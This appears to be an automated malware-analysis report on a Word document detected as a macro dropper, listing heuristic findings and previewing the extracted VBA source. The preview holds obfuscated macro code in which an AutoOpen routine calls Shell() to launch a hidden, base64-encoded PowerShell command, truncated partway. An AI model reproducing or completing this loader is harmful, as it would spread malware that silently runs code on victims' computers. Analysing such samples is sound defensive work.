MALICIOUS
242
Risk Score
Heuristics 7
-
ClamAV: Doc.Dropper.Agent-6555924-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6555924-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 17189 bytes |
SHA-256: 7f6940c0df7155d321ba508c1294cadbed87eaad5e013d60a421649816173a32 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "SIENVrpqsEzaR" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function NTDpKIPNr() On Error Resume Next CRtCR = kvJpp - Cos(CBtDHb) * 1 - Chr(48747) / 18555 - ChrB(ICjSJ) FqlYV = 9412 lhHnjj = mSiZSK - Cos(jSCYlB) * 1 - Chr(66815) / 88474 - ChrB(JjIGi) YRUWS = 31326 NTDpKIPNr = kwMZBuC + IUXizuBmja + wvQmuaJ + nBFqnwDUcKn + MhMNHln + vTizN + YubADWTq + ZOlKRIzcQfJ + DzITv + DcoYUfaIKm wUvpL = qTKAwV - Cos(XizjD) * 1 - Chr(3454) / 84020 - ChrB(wDXdS) uRFvrP = 45002 End Function Sub Autoopen() On Error Resume Next icvpC = vzjKl - Cos(jpRkS) * 1 - Chr(31730) / 47306 - ChrB(zQXMsw) CEEGFz = 1865 adDibd (NTDpKIPNr) XnOzn = wTNrK - Cos(FzUcb) * 1 - Chr(83295) / 57625 - ChrB(RFjwD) tufDj = 18187 End Sub Function adDibd(EIoMGp) On Error Resume Next puzEQk = wzJVi - Cos(qCkbfO) * 1 - Chr(40596) / 53801 - ChrB(RERwfd) oKLAV = 30243 XYKGH = UvOOGR - Cos(JEXSoD) * 1 - Chr(13889) / 55611 - ChrB(mUFtuI) KhbazN = 5512 kZIrcrZiz = Shell(bFqQBzIGwC + Chr(vbKeyP) + jTOXNP + EIoMGp, vbHide) HNBNW = DqOmuk - Cos(sMRIci) * 1 - Chr(72015) / 81525 - ChrB(NfLwE) iqtwBD = 20908 End Function Attribute VB_Name = "BtGDjiqGzYM" Function kwMZBuC() On Error Resume Next wrcPok = DCERqK - Cos(brVBUz) * 1 - Chr(71813) / 78175 - ChrB(GtTRXP) NNcZO = 54015 iirsI = "owersHeLL -Wi" + "nDowsTyle hidde" + "n -e KAAo" + "ACIAewAxADMAOQB" + "9AHsANgB9AHsAOQ" + "AxAH0AewA3ADQ" + "AfQB7ADEAMQA" XqbmD = AzkIlG - Cos(zzszvK) * 1 - Chr(88203) / 40761 - ChrB(USVot) EOkTzq = 97241 CTDUX = "wAH0AewAyADkAf" + "QB7ADgAMwB" + "9AHsAMg" + "A2AH0AewA" + "4AH0AewA5ADA" sLhoz = JKfQd - Cos(NVcdE) * 1 - Chr(65811) / 60785 - ChrB(WIQPG) uWXSH = 92438 PjiBpTndO = "AfQB7AD" + "EAMQAxAH0AewAxA" + "H0AewA5ADMAf" + "QB7ADEAMAA5A" + "H0AewAxADQAM" pzoNVw = MJmEL - Cos(dilHPR) * 1 - Chr(20661) / 95134 - ChrB(kuSioM) nNJjMX = 42850 PaDGQOL = "wB9AH" + "sAOAAwAH0A" + "ewA2ADMAfQ" + "B7ADgAM" + "QB9AHsAOAA2AH" + "0AewAxADIA" + "MAB9AHsAO" + "QA2AH0AewA" + "4ADcAfQB7ADI" + "ANAB9AHsAMQ" PilSoM = MEYfM - Cos(QCplBB) * 1 - Chr(28130) / 88996 - ChrB(nIAZWZ) iUGMzr = 63393 mAcjiCjdpNS = "AzADcAfQ" + "B7ADkAN" + "QB9AHsAMQAxADY" + "AfQB7ADYAMQB" + "9AHsAMQAyADUA" + "fQB7ADE" + "AMwAzAH0AewAxAD" + "AAMwB9AHsANA" sJbPiO = IACWK - Cos(vLVHt) * 1 - Chr(39623) / 90698 - ChrB(ROpwRa) YznZV = 20327 sGNLuO = "A1AH0Ae" + "wA2ADkAfQB7ADQ" + "AfQB7ADEA" + "MwB9A" + "HsAMgA3A" sazMhd = zXAOai - Cos(kEDWl) * 1 - Chr(3027) / 51634 - ChrB(mSQnFj) OzoJC = 36939 fpcPzDIA = "H0AewAx" + "ADIAMgB9AHsANAA" + "yAH0A" + "ewA3AD" + "UAfQB7" + "ADEAMwA1AH0" + "AewA0ADcAfQB7A" IhnRiS = phqruo - Cos(kCkIRz) * 1 - Chr(76683) / 62999 - ChrB(tYPwJD) Rfqpw = 42093 tiYGpkw = "DEAMgA4AH0Aew" + "A1ADMAfQB7ADYAN" + "wB9AHsAMQA0ADAA" + "fQB7ADEAMQA5A" UWIEzl = wKvGi - Cos(EAkWHb) * 1 - Chr(72417) / 89269 - ChrB(PThlHY) EwzOT = 29934 CDnuOJAz = "H0AewA2ADIAfQB" + "7ADUANQB9AHs" + "AMQAzA" + "DQAfQB" + "7ADMAMAB9AHsAMw" + "AzAH0AewA" + "5ADkAfQB7ADEAMA" + "A2AH0AewA" kwMZBuC = iirsI + CTDUX + PjiBpTndO + PaDGQOL + mAcjiCjdpNS + sGNLuO + fpcPzDIA + tiYGpkw + CDnuOJAz End Function Function IUXizuBmja() On Error Resume Next JsqvWz = TriJU - Cos(uThVk) * 1 - Chr(78133) / 53163 - ChrB(pXLdA) FwIQap = 27018 WPJiHWJRsKt = "xADIANAB" + "9AHsAMQ" + "AwADQAfQB" + "7ADEAMgA3AH0" + "AewA5ADIAfQ" dQfPzi = cCcmHR - Cos(Rcdfni) * 1 - Chr(38405) / 39757 - ChrB(SVNHWi) ifDSp = 32449 VjtHBPEwWE = "B7ADUANwB9" + "AHsAMgA1AH0" + "AewAzADgAf" + "QB7ADEAN" + "AB9AHsAM" + "gA4AH0Aew" + "AxADkAfQB7ADE" UrwLNU = qtSVfj - Cos(vBjHJm) * 1 - Chr(26511) / 88605 - ChrB(XZtotH) wuAmJ = 76673 wNKXRkFQiE = "ANQB9AH" + "sAMgB9AHsAMQAwA" + "DEAfQB7" + "ADkANwB9" + "AHsAMQAz" + "ADEAfQB7ADEAM" + "wA4AH0Aew" TGzvbb = mqBbni - Cos(Ljiba) * 1 - Chr(14165) / 49309 - ChrB(TfpjqT) fudHKP = 1800 cqcNkUIMR = "AxADMANg" + "B9AHsAMQAxAH0Ae" + "wA1AH0AewA3AD" + "EAfQB7ADEAMQA0" + "AH ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.